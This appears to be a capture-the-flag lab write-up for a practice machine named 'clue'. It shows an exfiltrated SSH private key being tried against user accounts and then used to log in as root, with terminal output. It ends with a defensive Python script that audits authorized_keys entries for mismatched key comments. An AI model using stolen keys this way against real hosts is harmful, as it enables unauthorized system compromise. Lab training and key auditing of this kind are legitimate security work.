SSH


An SSH private key was exfiltrated.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh cassie@$IP -i ./id_rsa
cassie@192.168.220.240's password: 
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh anthony@$IP -i ./id_rsa
anthony@192.168.220.240's password: 

The exfiltrated id_rsa key does not belong to either of them; both logins fall back to a password prompt.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh-keygen -lf id_rsa
2048 SHA256:PN6pyaVqalSAe2eLdTcog5/dsxHYnOaaDsqKw/vYRPs anthony@clue (RSA)

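The key's comment field (anthony@clue) says it belongs to the anthony user. The comment is only a label and does not determine which accounts accept the key.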

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh root@$IP -i ./id_rsa
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 25 17:08:03 2025 from 192.168.45.192
root@clue:~# whoami
root
root@clue:~# hostname
clue
root@clue:~# ipconfig
-bash: ipconfig: command not found
root@clue:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:77:65 brd ff:ff:ff:ff:ff:ff
    inet 192.168.220.240/24 brd 192.168.220.255 scope global ens192
       valid_lft forever preferred_lft forever

The key belongs to the root account. System-level compromise.
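
The same question can be answered from the server side during an audit. The Python below is an added example, not part of the original notes: it computes the SHA256 fingerprint that `ssh-keygen -lf` prints for each authorized_keys entry and flags entries whose comment names a different user than the account trusting them, as with the anthony@clue key accepted for root. The key blobs and SAMPLE are constructed, and parse_entry, audit, who_authorizes, mismatches and fake_key are hypothetical helper names.

```python
import base64
import hashlib

def parse_entry(line):
    """Return (fingerprint, comment) for one authorized_keys line, else None."""
    fields = line.strip().split()
    for i in range(len(fields) - 1):
        try:
            blob = base64.b64decode(fields[i + 1], validate=True)
        except ValueError:
            continue
        # The blob opens with a length-prefixed copy of the key type; checking
        # it skips a leading options field and rejects comment lines.
        n = int.from_bytes(blob[:4], "big")
        if blob[4:4 + n] != fields[i].encode():
            continue
        digest = hashlib.sha256(blob).digest()
        fp = "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
        return fp, " ".join(fields[i + 2:])
    return None

def audit(accounts):
    """Map each fingerprint to the [(account, comment)] entries that trust it."""
    trust = {}
    for account, text in accounts.items():
        for line in text.splitlines():
            entry = parse_entry(line)
            if entry:
                trust.setdefault(entry[0], []).append((account, entry[1]))
    return trust

def who_authorizes(fp, accounts):
    return sorted(a for a, _ in audit(accounts).get(fp, []))

def mismatches(accounts):
    """Entries whose comment names a user other than the trusting account."""
    return sorted((a, c) for pairs in audit(accounts).values()
                  for a, c in pairs if c and c.split("@")[0] != a)

def fake_key(seed, comment):
    # Constructed blob: real wire framing, filler bytes instead of RSA numbers.
    blob = b"\x00\x00\x00\x07ssh-rsa" + hashlib.sha256(seed).digest()
    return "ssh-rsa " + base64.b64encode(blob).decode() + " " + comment

# Constructed sample mirroring the page: root trusts a key labelled anthony@clue.
SAMPLE = {
    "root": fake_key(b"k1", "anthony@clue"),
    "anthony": "# no keys installed\n",
    "cassie": 'no-pty,command="uptime" ' + fake_key(b"k2", "cassie@clue"),
}
```

A mismatch is a lead to review rather than proof of misuse, since the comment is free text. On a real host, build the mapping from each account's authorized_keys file.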